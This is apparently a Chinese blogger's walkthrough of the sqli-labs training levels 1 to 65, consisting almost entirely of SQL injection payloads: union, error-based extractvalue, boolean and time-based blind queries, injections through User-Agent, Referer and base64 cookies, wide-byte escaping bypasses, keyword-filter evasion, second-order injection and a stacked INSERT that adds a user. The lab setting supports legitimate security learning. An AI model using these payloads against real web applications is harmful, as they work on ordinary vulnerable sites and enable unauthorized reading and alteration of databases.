sql-labs 通关！

sql-labs 通关！

接触web也有半年左右了，是时候把自己做的一些笔记发出来了。

要记得看看源代码：有些关卡通关方式不止一种，不要被别人的答案局限了。

sql-labs1:

?id=-2' union select 1,database(),3--+

sql-labs2:

?id=-2 union select 1,database(),3

sql-labs3:

?id=-2') union select 1,database(),3 --+

sql-labs4:

?id=2" and extractvalue(1,concat(0x7e,(database()))) and "1"="1

sql-labs5:

?id=2' and extractvalue(1,concat(0x7e,(database())))--+

sql-labs6:

?id=2" and extractvalue(1,concat(0x7e,(database())))--+

sql-labs7:

?id=2')) and extractvalue(1,concat(0x7e,(database())))--+

sql-labs8:

?id=2' and length (database())>1--+

sql-labs9:

?id=2' and if(length(database())>1,sleep(2),1)--+

sql-labs10:

?id=2" and if(length(database())>1,sleep(2),1)--+

sql-labs11:抓包注入

uname=admin' and extractvalue(1,concat(0x7e,(database())))--+

sql-labs12:

uname=admin") and extractvalue(1,concat(0x7e,(database())))--+

sql-labs13:

uname=admin') and extractvalue(1,concat(0x7e,(database())))--+

sql-labs14:

uname=admin" and extractvalue(1,concat(0x7e,(database())))--+

sql-labs15:

uname=admin' and if(length(database())>1,sleep(2),1)--+

sql-labs16:

uname=admin") and if(length(database())>1,sleep(2),1)--+

sql-labs17:

uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(database())))--+

sql-labs18:

User-Agent: .....Firefox/73.0' and extractvalue(1,concat(0x7e,(database()))) and '1'='1

sql-labs19:

Referer: ..../Less-19/' and extractvalue(1,concat(0x7e,(database()))) and '1'='1

sql-labs20:

Cookie: uname=admin' and extractvalue(1,concat(0x7e,(database())))--+; 

sql-labs21:

Cookie: uname=YWRtaW43JyBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKGRhdGFiYXNlKCkpKSkgYW5kICcxJz0nMQ==;

sql-labs22:

Cookie: uname=YWRtaW43ACIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChkYXRhYmFzZSgpKSkpIGFuZCAiMSI9IjE=;

sql-labs23:

?id=2' and extractvalue(1,concat(0x7e,(database()))) and '1'='1

sql-labs24:二次注入

先进phpmyadmin里面看看有哪些用户，然后我注册了一个admin1'#的用户，密码随便。这个时候即使'被转义了，但是其插入到数据库中之后还是正常的。
然后接下来更改admin1'#的密码。这个时候update语句就会把admin1'#从数据库里取出来，因为是从数据库里取出来的，所以程序员认为它是安全的，并没有
对它进行转义，然后就导致：实际上更改了admin1的密码。

sql-labs25:

?id=-2%27 anandd extractvalue(1,concat(0x7e,(database())))--+

sql-labs26:

?id=-1%27||extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))))||%271%27=%271

sql-labs26a:

?id=0%27||(select(count(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))>1||%271%27=%272

这种不能用空格的，别看别人的答案，自己多尝试几遍就非常熟练了。

sql-labs27:

?id=0%27||extractvalue(1,concat(0x7e,(sEleCt(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))))||%271%27=%272

sql-labs27a:

?id=0"||(selselselectectect(count(table_name))from(information_schema.tables)where(table_schema=database()))=4||"1"="2

sql-labs28:

?id=2%27)||(select(count(table_name))from(information_schema.tables)where(table_schema=database()))=4||(%271%27=%272

sql-labs28a:

?id=2%27 and (SeLect count(table_name) from information_schema.tables where table_schema=database())>1 and %271%27=%271

sql-labs29:

?id=-2%27 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

sql-labs30:

?id=-2" union select 1,2,database()--+

sql-labs31:

?id=-2") union select 1,database(),3 and ("1"="2

sql-labs32:

?id=-2%df%27%20union%20select%201,database(),3--+

sql-labs33:

?id=-2%df%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+

sql-labs34:

uname=admin%df' and extractvalue(1,concat(0x7e,(database())))--+

sql-labs35:

?id=-2 union select 1,2,database()

sql-labs36:bypass mysql_real_escape_string

?id=-2%df%27%20union%20select%201,2,database()--+

sql-labs37:

password=123456%df' and extractvalue(1,concat(0x7e,(database())))#

sql-labs38:主要看下这个函数 mysqli_more_results()

?id=-2%27 union select 1,2,database()--+

sql-labs39:

?id=-2 union select 1,2,database()--+

sql-labs40:

?id=2%27 and length(database())=8 and %271%27=%271

sql-labs41:

?id=-2 union select 1,2,database()

sql-labs42:堆叠或者直接报错

password=123'+and+extractvalue(1,concat(0x7e,(database())))+and+'1'='1

';insert into users values(99,'dawn','dawn')#

sql-labs43:

password=123'+and+extractvalue(1,concat(0x7e,(database())))+and+'1'='1

sql-labs44:

password=123456'+and+(length(database())>1)+and+'1'='1

sql-labs45:

password=123456'+and+(length(database())>1)+and+'1'='1

sql-labs46:

?sort=rand(length(database())=8)

?sort=extractvalue(1,concat(0x7e,(database())))

?sort=if(length(database())>10,sleep(3),1)

sql-labs47:

?sort=-1' and extractvalue(1,concat(0x7e,(database())))--+

sql-labs48:

?sort=rand(length(database())>3)

sql-labs49:

?sort=1%27%20and%20if(length(database())%3E7,sleep(3),1)--+

sql-labs50:

?sort=1 and extractvalue(1,concat(0x7e,(database())))

?sort=rand(length(database())>1)

sql-labs51:

?sort=1' and extractvalue(1,concat(0x7e,database()))--+

?sort=1' and if((length(database())>1),sleep(3),1)--+

sql-labs52:

?sort=2 and if((length(database())>1),sleep(2),1)

sql-labs53:

?sort=1' and if((length(database())>1),sleep(2),1)--+

sql-labs54:
从这一关往后，最主要的不同就是限制了测试的次数。而且表名列名值随机

?id=-2' union select 1,2,database()--+

sql-labs55:

?id=-2) union select 1,2,database()--+

sql-labs56:

?id=-2') union select 1,2,secret_1M0Y from rj17gc4jhw--+

sql-labs57:

?id=-2" union select 1,2,database()--+

sql-labs58:

?id=-2' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1

sql-labs59:

?id=-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

sql-labs60:

?id=-2") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and ("1"="1

sql-labs61:

?id=-2')) and extractvalue(1,concat(0x7e,(database()))) and (('1'='1

sql-labs62:

?id=2' and (length(database())>1) and '1'='1

sql-labs63:

?id=2' and (length(database())>1) and '1'='1

sql-labs64:

?id=2" and (length(database())>1) and "1"="1

sql-labs65:

?id=2" and (length(database())>1) and "1"="1